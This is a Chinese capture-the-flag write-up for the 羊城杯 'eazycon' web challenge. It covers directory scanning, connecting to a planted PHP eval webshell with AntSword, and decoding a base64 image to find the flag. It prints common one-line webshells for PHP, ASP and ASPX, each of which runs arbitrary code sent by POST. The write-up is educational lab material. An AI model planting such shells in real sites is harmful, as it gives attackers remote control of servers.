天天看點

羊城杯web(eazycon)

進入題目環境

羊城杯web(eazycon)

用dirsearch掃一下

羊城杯web(eazycon)
羊城杯web(eazycon)

通路 /index.php

由彈窗内容可以聯想到一句話木馬

<?php @eval($_POST['cmd']);?>

羊城杯web(eazycon)

常見一句話木馬

php的一句話木馬: <?php @eval($_POST['shell']);?>

asp的一句話是:   <%eval request ("shell")%>

aspx的一句話是:  <%@ Page Language="Jscript"%>
				<%eval(Request.Item["shell"],"unsafe");%>
           

蟻劍連接配接

羊城杯web(eazycon)
羊城杯web(eazycon)
羊城杯web(eazycon)

目錄下發現一個.txt 檔案

羊城杯web(eazycon)

下載下傳該檔案

得到很長的一段結尾是等号的字元串,我開始還用base64解碼解不出來,真的是蠢,flag哪有那麼長,這肯定是一張圖檔的base64編碼呀,寫個img标簽就能解決(學會新技能了0.0)

羊城杯web(eazycon)
羊城杯web(eazycon)

吐槽一下,每一次做的題裡面,都有上面這樣的圖檔,難道是因為CTF界盛産二次元?(不過,,,真的好看0.0)

img标簽的其他格式

data:,文本資料

    data:text/plain,文本資料

    data:text/html,HTML代碼
    
    data:text/html;base64,base64編碼的HTML代碼

    data:text/css,CSS代碼

    data:text/css;base64,base64編碼的CSS代碼

    data:text/javascript,Javascript代碼

    data:text/javascript;base64,base64編碼的Javascript代碼

    data:image/gif;base64,base64編碼的gif圖檔資料

    data:image/png;base64,base64編碼的png圖檔資料

    data:image/jpeg;base64,base64編碼的jpeg圖檔資料

    data:image/x-icon;base64,base64編碼的icon圖檔資料